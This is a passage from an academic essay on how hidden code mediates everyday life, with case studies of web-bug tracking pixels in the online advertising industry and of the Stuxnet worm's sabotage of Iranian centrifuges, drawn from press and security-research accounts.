Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, while having concrete effects nonetheless. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep - although it is useful to note that some theorists, such as Frabetti (2010), have problematised Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012).&amp;amp;nbsp; &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website, it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. The analysis performed by Langner (2011) and others, was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus (see Sanger, 2012). Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&amp;amp;nbsp;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
  [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
**Kazakhstan -&amp;amp;nbsp;1.3% &lt;br /&gt;
**Rest of World -&amp;amp;nbsp;9.4%&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
''Table 1: Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.).'' &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;Clearly, this kind of attack could be mobilized at targets other than nuclear enrichment facilities, and indeed the stealth and care with which it attempts to fool the operators of the plants shows that computational devices will undoubtedly be targets for monitoring, surveillance, control and so forth in the future. But, of course, once the code for undertaking this kind of sophisticated cyberattack is out in the open it is relatively trivial to decode the computer code and learn techniques that would have taken many years of development in a very short time. As Sean McGurk explains, ‘you can download the actual source code of Stuxnet now and you can repurpose it and repackage it and then, you know, point it back towards wherever it came from’ (60 Minutes, 2012b). Indeed, a different worm, called Duqu, has already been discovered, albeit with purposes linked to the collection of the data on industrial control systems and structures, a so-called ‘Trojan’ (Hopkins, 2011).[10] As Alexander Gostev reports: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;There were a number of projects involving programs based on the 'Tilded' [i.e. Stuxnet] platform throughout the period 2007-2011. Stuxnet and Duqu are two of them – there could have been others, which for now remain unknown. The platform continues to develop, which can only mean one thing – we’re likely to see more modifications in the future. (2012)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The increased ability of software and code via computational devices to covertly monitor, control and mediate, both positively and negatively, is not just a case of interventions for deceiving the human and non-human actors that make up part of these assemblages. In the next section I want to look at the willing compliance with data collection, indeed the enthusiastic contribution of real-time data to computational systems as part of the notion of lifestreams, and more particularly the quantified self movement.&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
== '''Lifestreams'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
